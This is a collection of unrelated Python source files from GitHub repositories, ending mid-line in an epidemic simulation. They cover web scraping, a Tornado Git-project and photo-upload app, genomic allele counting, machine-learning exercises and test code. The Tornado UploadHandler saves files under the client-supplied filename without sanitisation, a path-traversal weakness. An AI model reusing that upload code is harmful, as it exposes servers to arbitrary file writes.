@property\n def value(self) -> str:\n return self.__value\n\n @value.setter\n def value(self, value) -> str:\n value = value.select_one(self.parse_cmd[\"name\"]).text\n\n self.__value = value\n\n\nclass ArticleLink(Value):\n @property\n def value(self) -> str:\n return self.__value\n\n @value.setter\n def value(self, value) -> str:\n value = value.select_one(self.parse_cmd[\"link\"]).get(\"href\")\n\n if self.parse_cmd[\"search_link\"] not in value:\n value = self.parse_cmd[\"create_link\"] + value\n\n self.__value = value\n\n\nclass ArticlePushTime(Value):\n @property\n def value(self) -> str:\n return self.__value\n\n @value.setter\n def value(self, value) -> str:\n value = value.select_one(self.parse_cmd[\"push_time\"]).text\n\n self.__value = value\n\n\nclass ArticleStop(Value):\n @property\n def value(self) -> str:\n return self.__value\n\n @value.setter\n def value(self, value) -> str:\n date_now = datetime.now().date()\n\n stop_date = value.select_one(self.parse_cmd[\"stop_select\"]).get(\"href\")\n\n parse_date = re.findall(\n r\"/+\\d{4}/+\\d{2}/+\\d{2}|/+\\d{4}/+\\d{2}/+\\d{1}\", stop_date\n )[0]\n\n now_date = datetime.strftime(date_now, \"/%Y/%m/\" + str(date_now.day))\n\n if parse_date != now_date:\n self.__value = True\n else:\n self.__value = False\n\n\nclass ArticalTextContent(Value):\n def __init__(self, value, type_news) -> None:\n self.type_news = type_news\n self.parse_cmd = pd.PARSE_DICT\n\n self.__value: str = \"\"\n self.value: str = value\n\n @property\n def value(self) -> str:\n return self.__value\n\n @value.setter\n def value(self, value) -> str:\n for key in self.parse_cmd:\n parse_cmd = self.parse_cmd[key]\n\n cont = value.select(parse_cmd[\"text_content\"])\n\n if cont != []:\n value = list([text.text for text in cont])\n break\n\n self.__value = value\n\n\nclass ParseArticle:\n parse_name = ArticleName\n parse_link = ArticleLink\n parse_stop = ArticleStop\n parse_push_time = ArticlePushTime\n\n def __init__(self, article, type_news: str) -> None:\n self.name: str = self.parse_name(article, type_news).value\n self.link: str = self.parse_link(article, type_news).value\n self.stop_iter: str = self.parse_stop(article, type_news).value\n self.push_time: str = self.parse_push_time(article, type_news).value\n self.type_news: str = type_news\n\n","repo_name":"DioSWolF/web_command_project","sub_path":"personal_assistant/news/parser/parse_cls.py","file_name":"parse_cls.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"44798144218","text":"# -*- coding: utf-8 -*-\n# @Author: Mehaei\n# @Date: 2020-08-06 17:17:59\n# @Last Modified by: Mehaei\n# @Last Modified time: 2020-08-13 18:47:39\n\nimport tornado.web\nimport os\nimport re\nfrom pycket.session import SessionMixin\nfrom project.config import WORKDIR, GIT_PROJECT_DIR\nfrom helper.tools import excute_cmd_get_result\n# from utils import photo\n\nclass AuthBaseHandler(tornado.web.RequestHandler,SessionMixin):\n def get_current_user(self): #重写get_current_user()方法\n return self.session.get('user_info', None) #session是一种会话状态,跟数据库的session可能不一样\n\n#添加装饰器,装饰需要验证的请求\n# class IndexHandler(AuthBaseHandler):\nclass IndexHandler(tornado.web.RequestHandler):\n \"\"\"\n \"\"\"\n # @tornado.web.authenticated #@tornado.web.authenticated装饰器包裹get方法时,表示这个方法只有在用户合法时才会调用,authenticated装饰器会调用get_current_user()方法获取current_user的值,若值为False,则重定向到登录url装饰器判断有没有登录,如果没有则跳转到配置的路由下去,但是要在app.py里面设置login_url\n def get(self, *args, **kwargs):\n show_file_list = []\n\n search_name = self.get_argument('search_name', None)\n for file_name in os.listdir(GIT_PROJECT_DIR):\n if os.path.isdir(\"%s/%s\" % (GIT_PROJECT_DIR, file_name)):\n if search_name:\n if re.search(search_name, file_name):\n show_file_list.append(file_name)\n else:\n continue\n else:\n show_file_list.append(file_name)\n\n # self.render('index.html')\n work_list = self.get_branch(show_file_list)\n self.render('project_list.html', work_list=work_list)\n\n def get_branch(self, work_list):\n new_work_list = []\n\n cmd = [\"git\", \"branch\"]\n for wdir in work_list:\n os.chdir(\"%s/%s\" % (GIT_PROJECT_DIR, wdir))\n wdir_info = (wdir, excute_cmd_get_result(cmd, rgx=r\"\\*.+\\n\", clean=self.replace_branch, error_return=\"isn't git project\"))\n new_work_list.append(wdir_info)\n\n os.chdir(WORKDIR)\n return new_work_list\n\n def replace_branch(self, strr):\n return strr.strip(\"*| |\\n\")\n\n\nclass ExploreHandler(AuthBaseHandler):\n \"\"\"\n Explore page,photo of other users 发现页-----发现或最近上传的图片页面\n \"\"\"\n @tornado.web.authenticated\n def get(self,*args,**kwargs):\n # image_urls = get_images(\"./static/uploads\") #打开指定路径下的文件,或者static/uploads\n os.chdir('static') # 用于改变当前工作目录到指定的路径\n image_urls = photo.get_images(\"uploads/thumbs\")\n os.chdir(\"..\")\n self.render('explore.html',image_urls=image_urls)\n\nclass PostHandler(AuthBaseHandler):\n \"\"\"\n Single photo page and maybe 单个图片详情页面\n \"\"\"\n @tornado.web.authenticated\n def get(self,post_id):\n print(post_id)\n self.render('post.html',post_id = post_id) #根据正则输入的内容,接收到,打开相应的图片\n\n\nclass UploadHandler(AuthBaseHandler): #上传文件\n @tornado.web.authenticated\n def get(self,*args,**kwargs):\n self.render('upload.html')\n\n def post(self,*args,**kwargs):\n file_imgs = self.request.files.get('newImg',None) #获取上传文件数据,返回文件列表\n\n for file_img in file_imgs: #可能同一个上传的文件会有多个文件,所以要用for循环去迭代它\n # filename 文件的实际名字,body 文件的数据实体;content_type 文件的类型。 这三个对象属性可以像字典一样支持关键字索引\n save_to = 'static/uploads/{}'.format(file_img['filename'])\n #以二进制格式打开一个文件只用于写入。如果该文件已存在则打开文件,并从开头开始编辑,即原有内容会被删除。如果该文件不存在,创建新文件。一般用于非文本文件如图片等。\n with open(save_to,'wb') as f: #二进制\n f.write(file_img['body'])\n photo.make_thumb(save_to) #同时生成缩略图\n\n self.redirect('/explore')\n","repo_name":"Mehaei/LocalGit","sub_path":"handlers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3693981198","text":"import requests\nimport zlib\nimport json\nfrom typing import Tuple\nimport xml.dom.minidom as minidom\n\ndef clean_whitespace(contents: str) -> str:\n \"\"\" Return the given string with all line breaks and spaces removed.\"\"\"\n lines = [line.strip(\" \\r\\n\") for line in contents.split('\\n')]\n return ''.join(lines)\n\ndef parse_multipart_response(response: requests.Response) -> Tuple:\n content_type_parts = response.headers.get(\"content-type\").split(';')\n boundary = None\n for part in content_type_parts:\n part = part.strip()\n if part.startswith(\"boundary=\"):\n # Content-Type header can contain boundary=\"foo\"\n part = part.replace('\"', \"\")\n boundary = \"--\" + part.replace(\"boundary=\", \"\")\n break\n contents = response.raw.read()\n mime_parts = []\n if boundary:\n # The response was a multipart message and the parts can be processed.\n for part in contents.split(boundary.encode('utf-8')):\n if part:\n mime_parts.append(part)\n return mime_parts, contents\n\ndef get_multipart_soap_and_record_count(\n response_xml_part: bytes) -> Tuple[bytes, int]:\n \"\"\" Return the SOAP part and the record count in the query data response.\n Expecting response_xml_part to be the first part of the MIME multipart response.\n \"\"\"\n return _extract_operational_data_response_and_record_count(response_xml_part)\n\ndef _extract_operational_data_response_and_record_count(\n response_xml_part:bytes) -> Tuple[bytes, int]:\n response_xml = response_xml_part[response_xml_part.index(b\"<?xml\"):]\n dom = minidom.parseString(response_xml)\n record_count = _find_operational_data_response_record_count(dom)\n if record_count is None:\n raise Exception(\"The record count was not found in the operational data response\")\n return (response_xml, _find_operational_data_response_record_count(dom))\n\ndef _find_operational_data_response_record_count(response_xml: minidom.Document) -> int:\n record_count = response_xml.documentElement.getElementsByTagName(\"om:recordsCount\")\n if record_count:\n return int(record_count[0].firstChild.nodeValue)\n return None\n\ndef get_multipart_json_payload(gzipped_json_payload: bytes) -> dict:\n \"\"\" Return the gunzipped JSON payload of the query data response. \"\"\"\n return json.loads(\n _decompress_gzipped_attachment(gzipped_json_payload).decode('utf-8'))\n\ndef get_json_payload_as_string(gzipped_json_payload: bytes) -> str:\n \"\"\" Return the gunzipped JSON payload of the query data response. \"\"\"\n json_payload=json.loads(\n _decompress_gzipped_attachment(gzipped_json_payload).decode('utf-8'))\n return json.dumps(json_payload.get(\"records\"),sort_keys=True, indent=4)\n\ndef _decompress_gzipped_attachment(attachment: bytes) -> bytes:\n headers = \\\n b\"\\r\\ncontent-type:application/gzip\\r\\n\" \\\n b\"content-transfer-encoding: binary\\r\\n\" \\\n b\"content-id: <operational-monitoring-data.json.gz>\\r\\n\\r\\n\"\n\n gzipped_payload = attachment[len(headers):].rpartition(b'\\r\\n')[0]\n # From the manual of zlib:\n # 32 + (8 to 15): Uses the low 4 bits of the value as the window size logarithm,\n # and automatically accepts either the zlib or gzip format.\n # +8 to +15: The base-two logarithm of the window size.\n # The input must include a zlib header and trailer.\n decompressed_payload = zlib.decompress(gzipped_payload, 32 + 15)\n return decompressed_payload\n\ndef print_multipart_soap_and_record_count(\n soap_part: bytes, record_count: int, is_client: bool=True):\n print(\"Received the following SOAP response from the \" \\\n \"security server of the %s: \\n\" % (\"client\" if is_client else \"producer\"))\n xml = minidom.parseString(clean_whitespace(soap_part.decode(\"utf-8\")))\n print(xml.toprettyxml())\n print(\"The expected number of JSON records in the response payload: %d\" % (\n record_count,))\n","repo_name":"egobsv/pasarela-tenoli","sub_path":"estadísticas/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31832782694","text":"#!/usr/bin/env python\n\nfrom vdb import *\nimport multiprocessing, sys\n\n'''\ndef f1_a( mgr, ref, del_pos, del_len, ins ) :\n del_pos = 2\n del_len = 1\n ins = \"CCAA\"\n \n print \"ref = '%s' del: %d:%d ins: '%s'\" % ( ref, del_pos, del_len, ins )\n \n ref_var = mgr.make_ref_var( ref, del_pos, del_len, ins )\n \n #q = ref_var.search()\n #qr = ref_var.search_len()\n #print \"query = '%s' at: %d:%d, on ref: %d\" %( q[0], q[2], q[1], qr )\n \n ( a_bases, a_len, a_pos ) = ref_var.allele()\n ar = ref_var.allele_len()\n print \"allele = '%s' at: %d:%d, on ref: %d\" %( a_bases, a_pos, a_len, ar )\n\n#------------------------------------------------------------------------------------------------------------\ndef f1( mgr ):\n ref = \"ACCGGTTAACC\"\n \n del_pos = 2\n del_len = 1\n ins = \"CCAA\"\n\n f1_a( mgr, ref, del_pos, del_len, ins )\n f1_a( mgr, ref, del_pos, del_len, ins ) \n\n#------------------------------------------------------------------------------------------------------------\ndef f2( mgr, acc ) :\n refs = mgr.make_reflist( acc )\n count = refs.count()\n print \"we have %d references:\" % count\n for idx in xrange( count ) :\n print \"\\t No. %d\" % idx\n obj = refs.get( idx )\n #print \"\\t\\tidx:\\t%d\" % obj.get_idx()\n rr = obj.get_row_range()\n print \"\\t\\trows:\\t%d..%d\" % ( rr[0], rr[1] )\n #print \"\\t\\tbin:\\t%d\" % obj.get_bin()\n print \"\\t\\tSeqId:\\t%s\" % obj.get_seq_id()\n print \"\\t\\tname:\\t%s\" % obj.get_name()\n print \"\\t\\tlength:\\t%d\" % obj.get_length()\n print \"\\t\\tcirc:\\t%s\" % obj.is_circular()\n print \"\\t\\text:\\t%s\" % obj.is_external()\n #print \"\\t\\tdata:\\t%s\" % obj.read( 0, 50 )\n #print \"\\t\\tid-cnt:\\t%d\" % obj.id_count( rr[ 0 ] )\n\n\n#------------------------------------------------------------------------------------------------------------\ndef num( s ):\n try:\n return int( s )\n except ValueError:\n return 0\n\n\n#------------------------------------------------------------------------------------------------------------\ndef split_cigar( cigar ) :\n res = list()\n op_len = \"\"\n for i in xrange( 0, len( cigar ) ) :\n op = cigar[ i ]\n if op >= '0' and op <= '9' :\n op_len = op_len + op\n else :\n tup = ( num( op_len ), op )\n op_len = \"\"\n res.append( tup )\n return res\n\n\n#------------------------------------------------------------------------------------------------------------\ndef f3( mgr, acc ) :\n cur = mgr.open_db( acc ).open_tab( \"PRIMARY_ALIGNMENT\" ).make_cursor()\n cols = cur.open( [ \"CIGAR_SHORT\", \"READ\", \"REF_SEQ_ID\", \"REF_POS\", \"REF_LEN\" ] )\n row = read_row( cols, 1 )\n print row\n\n\n#------------------------------------------------------------------------------------------------------------\ndef f4( mgr, acc ) :\n cur = mgr.open_db( acc ).open_tab( \"PRIMARY_ALIGNMENT\" ).make_cursor()\n cols = cur.open( [ \"CIGAR_SHORT\", \"READ\", \"REF_SEQ_ID\", \"REF_POS\", \"REF_LEN\" ] )\n row_range = cols[ \"READ\" ].range()\n print row_range\n for row in row_range :\n row_data = read_row( cols, row )\n if row % 1000 == 0 :\n sys.stdout.write( '.' )\n sys.stdout.flush()\n\n#------------------------------------------------------------------------------------------------------------\ndef cigar_splitter( cigar, ref_pos, reference ) :\n ops = split_cigar( cigar )\n \n\n#------------------------------------------------------------------------------------------------------------\ndef handle_reference( ref_obj, total, prim_alig_id_col, prim_cols, cigars ) :\n res = total\n ref_rows = ref_obj.get_row_range()\n ref_len = ref_obj.get_length()\n name = ref_obj.get_seq_id()\n #read the whole reference in...\n reference = ref_obj.read( 0, ref_len )\n print \"\\n\", name, ref_len, len( reference )\n # for each row in the reference-table of this reference\n for ref_row in xrange( ref_rows[ 0 ], ref_rows[ 1 ] + 1 ) :\n prim_ids = prim_alig_id_col.read( ref_row )\n #for each alignment in this reference-block\n for prim_id in prim_ids :\n row_data = read_row( prim_cols, prim_id )\n cigar = row_data[ \"CIGAR_SHORT\" ]\n if cigar in cigars.keys() :\n cigars[ cigar ] += 1\n else :\n cigars[ cigar ] = 1\n res += 1\n if res % 1000 == 0 :\n sys.stdout.write( '.' )\n sys.stdout.flush()\n return res\n\n\n \n#------------------------------------------------------------------------------------------------------------\ndef f5( mgr, acc, ref_idx = None ) :\n db = mgr.open_db( acc )\n cur_a = db.open_tab( \"PRIMARY_ALIGNMENT\" ).make_cursor()\n cur_r = db.open_tab( \"REFERENCE\" ).make_cursor()\n refs = db.make_reflist()\n prim_cols = cur_a.open( [ \"CIGAR_SHORT\", \"READ\", \"REF_SEQ_ID\", \"REF_POS\", \"REF_LEN\" ] )\n prim_alig_id_col = cur_r.open( \"PRIMARY_ALIGNMENT_IDS\" )\n total = 0\n cigars = {}\n \n if ref_idx == None :\n # for each reference\n for idx in xrange( refs.count() ) :\n total += handle_reference( refs.get( idx ), total, prim_alig_id_col, prim_cols, cigars ) \n else :\n total += handle_reference( refs.get( ref_idx ), total, prim_alig_id_col, prim_cols, cigars ) \n \n print \"\\nhandled \", total, \" alignments\"\n print \"we have \", len( cigars ), \" different cigar-strings\"\n sorted_cigars = sorted( cigars, key = cigars.get, reverse = True )\n for w in sorted_cigars[ 0 : 10 ] :\n print w, cigars[ w ]\n\n'''\n\n#------------------------------------------------------------------------------------------------------------\ndef cigar2events( cigar ) :\n res = list()\n tmp = \"\"\n for c in cigar :\n if c >= '0' and c <= '9' :\n tmp += c\n else :\n res.append( ( int( tmp ), c ) )\n tmp = \"\"\n return res\n\n\n#------------------------------------------------------------------------------------------------------------\ndef events2dict( events ) :\n res = {}\n for ( len, op ) in events :\n res[ op ] = res.get( op, 0 ) + 1\n return res\n\n\n#------------------------------------------------------------------------------------------------------------\ndef adjacent( events, op1, op2 ) :\n res = 0\n last = 'x'\n for ( len, op ) in events :\n if op == op1 and last == op2 :\n res += 1\n if op == op2 and last == op1 :\n res += 1\n last = op\n return res\n\n\n#------------------------------------------------------------------------------------------------------------\ndef cigar_events( cigar, read, refname, pos ) :\n ref_pos = pos\n ali_pos = 0\n events = cigar2events( cigar )\n for ( len, op ) in events :\n if op == '=' : # we have a perfect match between reference and alignment '='\n ref_pos += len # we advance on alignment AND reference\n ali_pos += len\n\n elif op == 'X' : #we have a mismatch between reference and alignment 'X'\n yield ( refname, ref_pos, 0, read[ ali_pos : ali_pos + len ] )\n ref_pos += len # we advance on alignment AND reference\n ali_pos += len\n\n elif op == 'D' : #we have a deletion on the reference 'D'\n yield ( refname, ref_pos, len, '' )\n ref_pos += len # we advance only on reference\n\n elif op == 'I' : #we have a insertion on the reference 'I'\n yield ( refname, ref_pos, 0, read[ ali_pos : ali_pos + len ] )\n ali_pos += len # we advance only on alignment\n \n elif op == 'S' : #we have a soft clip 'S'\n ali_pos += len # we advance only on alignment\n\n elif op == 'H' : #we have a hard clip 'H'\n ali_pos += 0 # we do nothing\n\n elif op == 'N' : #we have a reference 'N'\n ref_pos += len # we advance on alignment AND reference\n\n else :\n ali_pos += 0 # we do nothing\n\n#------------------------------------------------------------------------------------------------------------\n# a generator of alleles...\ndef alleles( db, row_range = None ) :\n column_list = [ 'CIGAR_LONG', 'READ', 'REF_SEQ_ID', 'REF_POS', 'REF_LEN' ]\n prim_cols = db.open_tab( \"PRIMARY_ALIGNMENT\" ).make_cursor().open( column_list )\n for row in row_gen( prim_cols, row_range ) :\n cigar = row[ 'CIGAR_LONG' ]\n read = row[ 'READ' ]\n refname = row[ 'REF_SEQ_ID' ]\n refpos = row[ 'REF_POS' ][ 0 ]\n reflen = row[ 'REF_LEN' ][ 0 ]\n for c in cigar_events( cigar, read, refname, refpos, reflen ) :\n yield c\n print\n\n#------------------------------------------------------------------------------------------------------------\ndef refvar_consumer( q, filename ) :\n print( \"refvar_consumer() started\" )\n d = {}\n while True :\n signature = q.get()\n if signature == None :\n break\n d[ signature ] = d.get( signature, 0 ) + 1\n\n f = open( filename, \"w\" )\n for k, v in sorted( [ ( value, key ) for ( key, value ) in d.items() ], reverse=True ) :\n f.write( \"%d %s\\n\" %( k, v ) )\n f.close()\n print( \"refvar_consumer() done\" )\n\n\n#------------------------------------------------------------------------------------------------------------\ndef allel_consumer( mgr, acc, q_in, q_out1, q_out2 ) :\n print( \"allel_consumer() started\" )\n try :\n ref_list = mgr.OpenDB( acc ).ReferenceList()\n curr_ref = None\n ref_bases = None\n while True :\n t = q_in.get()\n if t == None :\n break\n ( ref_name, ref_pos, del_len, bases ) = t\n if curr_ref == None or curr_ref != ref_name :\n curr_ref = ref_name\n try :\n ref_obj = ref_list.find( ref_name )\n ref_bases = ref_obj.Read( 0, ref_obj.SeqLength() )[:]\n except vdb_error as e :\n print( e )\n\n sig1 = \"%s:%d:%d:%s\" % ( ref_name, ref_pos, del_len, bases )\n q_out1.put( sig1 )\n \n if len( bases ) > 0 :\n # we have insertion/mismatch : let's canonicalize it\n ref_var = mgr.RefVariation( ref_bases, ref_pos, del_len, bases )\n ( a_bases, a_len, a_pos ) = ref_var.GetAllele()\n sig2 = \"%s:%d:%d:%s\" % ( ref_name, a_pos, a_len, a_bases )\n else :\n # we have a pure deletion\n sig2 = sig1\n\n q_out2.put( sig2 )\n except vdb_error as e :\n print( e )\n q_out1.put( None )\n q_out2.put( None )\n print( \"allel_consumer() done\" )\n\n\n#------------------------------------------------------------------------------------------------------------ \ndef row_consumer_allel_producer( q_in, q_out ) :\n print( \"row_consumer() started\" )\n while True :\n row = q_in.get()\n if row == None :\n break\n try :\n cigar = row[ 'CIGAR_LONG' ]\n read = row[ 'READ' ]\n refname = row[ 'REF_SEQ_ID' ]\n refpos = row[ 'REF_POS' ][ 0 ]\n for c in cigar_events( cigar, read, refname, refpos ) :\n q_out.put( c )\n except vdb_error as e :\n print( e )\n\n print( \"row_consumer() done\" )\n q_out.put( None )\n\n\n#------------------------------------------------------------------------------------------------------------\ndef row_producer( mgr, acc, row_range, q ) :\n try :\n print( \"row_producer() started\" )\n db = mgr.OpenDB( acc )\n cols = [ 'CIGAR_LONG', 'READ', 'REF_SEQ_ID', 'REF_POS' ]\n prim_cols = db.OpenTable( \"PRIMARY_ALIGNMENT\" ).CreateCursor().OpenColumns( cols )\n for row in row_gen( prim_cols, row_range ) :\n q.put( row )\n q.put( None )\n print( \"row_producer() done\" )\n except vdb_error as e :\n print( e )\n\n\ndef process_accession( mgr, acc, row_range = None ) :\n row_q = multiprocessing.Queue()\n\n p_row_producer = multiprocessing.Process( target = row_producer, args = ( mgr, acc, row_range, row_q ), )\n\n allel_q = multiprocessing.Queue()\n \n p_row_cons = multiprocessing.Process( target = row_consumer_allel_producer, args = ( row_q, allel_q ), ) \n \n refvar_q1 = multiprocessing.Queue()\n refvar_q2 = multiprocessing.Queue()\n \n p_allel_cons = multiprocessing.Process( target = allel_consumer, args = ( mgr, acc, allel_q, refvar_q1, refvar_q2 ), )\n\n p_refvar1 = multiprocessing.Process( target = refvar_consumer, args = ( refvar_q1, \"ref_var_1.txt\" ), )\n p_refvar2 = multiprocessing.Process( target = refvar_consumer, args = ( refvar_q2, \"ref_var_2.txt\" ), )\n \n p_row_producer.start()\n p_row_cons.start()\n p_allel_cons.start()\n p_refvar1.start()\n p_refvar2.start()\n \n p_row_producer.join() \n p_row_cons.join()\n p_allel_cons.join()\n p_refvar1.join()\n p_refvar2.join()\n\n\n#------------------------------------------------------------------------------------------------------------\nif __name__ == '__main__':\n ACC = \"SRR1531793\"\n \n if len( sys.argv ) > 1 :\n ACC = sys.argv[ 1 ]\n\n mgr = manager( OpenMode.Read )\n process_accession( mgr, ACC )\n #f1( mgr )\n","repo_name":"ncbi/ncbi-vdb","sub_path":"py_vdb/ref_var.py","file_name":"ref_var.py","file_ext":"py","file_size_in_byte":13436,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"3"} +{"seq_id":"33216112497","text":"array = ['1. Apple', '2. Melon', '3. Banana', '4. Orange']\ndata = [\n {'menu1': 9000},\n {'menu2': 1000},\n {'menu3': 8000},\n]\n\n# indexing = array.index('Apple')\n# checkIndex = int(input('Masukkan angka index: '))\n\n# if(checkIndex-1 == indexing):\n# print('Apple')\n# else:\n# print('Buah yang lain')\n\nstring = 'hi my name is Luthfir'\n\n# print(isinstance(string, str))\nprint(string[3:])\n\n# for i, x in enumerate(array):\n# print(f\"{i+1}. {x}\")\n\n# for x in data:\n# print(x['menu1'] + \"menu1\")\n","repo_name":"luthfirrahmanb/purwadhika_data_science_module1","sub_path":"tryIndex.py","file_name":"tryIndex.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69944335122","text":"from scipy.stats import chisquare\n\nN=int(input(\"Enter the number of times experiment is performed\"))\nclasses=int(input(\"Enter the interval/classes\"))\n\nexpected=[]\n\nfor i in range(0,classes):\n\texpected.append(N/classes) \n\nprint(\"Enter the outcomes\") \n\nactual=[]\n\nfor i in range(0,classes):\n\tx=int(input(str(i+1)))\n\nactual.append(x) \nx=chisquare(actual,expected) \nprint(x)","repo_name":"championballer/labs","sub_path":"Modeling and Simulation/chi.py","file_name":"chi.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"23149704951","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 15 11:02:36 2021\n\n@author: vikas.maurya\n\"\"\"\n'''\nQuestions:\n1.The data file contains numerical attributes that describe a letter and its\ncorresponding class. Read the datafile “letterCG.data” and set all the numerical attributes\n as features.Split the data in to train and test sets.\n \n2. Fit a sequence of AdaBoostClassifier\nwith varying number of weak learners ranging from 1 to 16, keeping the max_depth as 1\nPlot the accuracy on test set against the number of weak learners.\nUse decision tree classifier as the base classifier.\n\n3.Repeat step2 with max_depth set as 2.\n\n'''\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfilePath=\"C:\\\\Users\\\\vikas.maurya\\\\Desktop\\\\AanlyticsAssignment_Edureka\\\\Model_selection_and_Boosting\\\\letterCG.bin\"\n\ndata=pd.read_csv(filePath,sep=' ')\n\n\ndata.drop([\"Unnamed: 5\", \"Unnamed: 18\", \"yegvx\"], axis=1, inplace=True)\ndata.fillna(0)\n\n\n\nX=data.iloc[:,1:]\nY=data[\"Class\"]\n\ndata.head()\n\n\n\nfrom sklearn import metrics\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.model_selection import train_test_split\n\ntrain_x, test_x, train_y, test_y = train_test_split(\n X, Y, random_state=5, test_size=0.30)\n\n\n\nbase_class = DecisionTreeClassifier(max_depth=1)\n\nada_Boost = AdaBoostClassifier(\n base_estimator=base_class, n_estimators=400, learning_rate=1, algorithm='SAMME')\n\nada_Boost.fit(train_x, train_y)\npredicted = ada_Boost.predict(test_x)\nmetrics.accuracy_score(predicted, test_y)\n\nplt.plot(predicted,test_y)\nplt.xlabel(\"predicted\")\nplt.ylabel(\"test\")\nplt.show()\n\nimport seaborn as sns\nsns.countplot(predicted)\n\nbase_class = DecisionTreeClassifier(max_depth=2)\nada_Boost = AdaBoostClassifier(\n base_estimator=base_class, n_estimators=400, learning_rate=1, algorithm='SAMME')\n\nada_Boost.fit(train_x, train_y)\npredicted = ada_Boost.predict(test_x)\nmetrics.accuracy_score(predicted, test_y)\n\n\n\n","repo_name":"vikas972/Analytics_course","sub_path":"Model_selection_and_Boosting/Case_Study_3_Model_Selection.py","file_name":"Case_Study_3_Model_Selection.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73164306320","text":"import os\nfrom typing import Any\nfrom unittest.mock import MagicMock, call, patch\n\nfrom hypothesis import given\nfrom hypothesis import strategies as st\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\n\nfrom macaron.config.target_config import Configuration\nfrom macaron.output_reporter.reporter import HTMLReporter, JSONReporter\nfrom macaron.output_reporter.results import Record, Report, SCMStatus\n\nfrom ..macaron_testcase import MacaronTestCase\nfrom ..st import JINJA_CONTEXT_DICT\n\nROOT_PATH = os.path.dirname(os.path.abspath(__file__))\n\n\nclass MockRecord(Record):\n \"\"\"A mock class for the record.\"\"\"\n\n def __init__(self, mock_data: dict) -> None:\n super().__init__(\n record_id=\"record\",\n description=\"sample_desc\",\n pre_config=Configuration({}),\n status=SCMStatus.AVAILABLE,\n context=MagicMock(),\n dependencies=[],\n )\n self.mock_data = mock_data\n\n def get_dict(self) -> dict:\n return self.mock_data\n\n\nclass TestHTMLReporter(MacaronTestCase):\n \"\"\"Test the HTMLReporter class.\"\"\"\n\n def test_no_html_template_found(self) -> None:\n \"\"\"Test initializing a HTMLReporter instance with a non-existing template.\"\"\"\n no_template_reporter = HTMLReporter(target_template=\"not_exist_template.html\")\n assert not no_template_reporter.template\n\n @given(mock_data=JINJA_CONTEXT_DICT, num_dep=st.integers(min_value=0, max_value=3))\n def test_gen_json_reports(self, mock_data: Any, num_dep: int) -> None:\n \"\"\"Test if JSONReporter can print JSON files without errors.\"\"\"\n report = Report(MockRecord(mock_data))\n for _ in range(num_dep):\n report.root_record.dependencies.append(MockRecord(mock_data))\n\n reporter = JSONReporter()\n\n with patch(\"builtins.open\") as mock_open:\n reporter.generate(\"report_paths\", report)\n calls = [call(os.path.join(\"report_paths\", \"dependencies.json\"), mode=\"w\", encoding=\"utf-8\")]\n mock_open.assert_has_calls(calls)\n\n @given(mock_data=JINJA_CONTEXT_DICT, num_dep=st.integers(min_value=0, max_value=3))\n def test_gen_html_reports(self, mock_data: Any, num_dep: int) -> None:\n \"\"\"Test if HTMLReporter can print HTML files without errors.\"\"\"\n report = Report(MockRecord(mock_data))\n for _ in range(num_dep):\n report.root_record.dependencies.append(MockRecord(mock_data))\n\n custom_jinja_env = Environment(\n loader=FileSystemLoader(ROOT_PATH),\n autoescape=select_autoescape(enabled_extensions=[\"html\", \"j2\"]),\n trim_blocks=True,\n lstrip_blocks=True,\n )\n\n reporter = HTMLReporter(env=custom_jinja_env, target_template=\"template.html\")\n with patch(\"builtins.open\") as mock_open:\n reporter.generate(\"report_paths\", report)\n mock_open.assert_called()\n","repo_name":"oracle/macaron","sub_path":"tests/output_reporter/test_reporter.py","file_name":"test_reporter.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"3"} +{"seq_id":"70365649682","text":"import os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\ndef mkdir(path):\n folder = os.path.isdir(path)\n\n if not folder: # 判断是否存在文件夹如果不存在则创建为文件夹\n os.makedirs(path) # makedirs 创建文件时如果路径不存在会创建这个路径\n print(\"--- new folder... ---\")\n print(\"--- OK ---\")\n\n else:\n print(\"--- There is this folder! ---\")\n\ndef save_excl(round,health,infector,cured,death):\n save_path = './result'\n mkdir(save_path)\n print('保存到'+save_path)\n result_excel = pd.DataFrame()\n result_excel[\"round\"] = round\n result_excel[\"health\"]=health\n result_excel[\"infector\"]=infector\n result_excel[\"cured\"] = cured\n result_excel[\"death\"] = death\n result_excel.to_excel(save_path + '/result.xlsx')\n\nclass People(object):\n def __init__(self, count=1000, first_infected_count=3):\n self.count = count\n self.first_infected_count = first_infected_count\n self.init()\n self.round = []\n self.health = []\n self.infector = []\n self.recovery = []\n self.death = []\n\n self.suscept_rate=0.3 #恢复到易感的概率\n self.suscept_time=60 #60天后开始免疫消退\n self.safe_distance=3 #传染距离,大于该距离不被传染\n self.infecte_rate=0 #传染率,基于高斯分布,0为50%\n self.R0=20 #最大传染人数\n self.death_rate=0.001 #死亡率,默认千分之一\n self.move_width=10 #移动距离,默认最大移动10格\n # 地图大小设为1000\n # 95%的人阳后5-14天痊愈\n # 每天随机大约25%的人不移动\n\n\n def init(self):\n self._people = np.random.normal(0, 200, (self.count, 2)) #地图大小设为1000\n self.reset()\n\n def reset(self):\n self._round = 0\n self._status = np.array([0] * self.count)\n self._timer = np.array([0] * self.count)\n self.random_people_state(self.first_infected_count, state=2)\n\n def random_people_state(self, num, 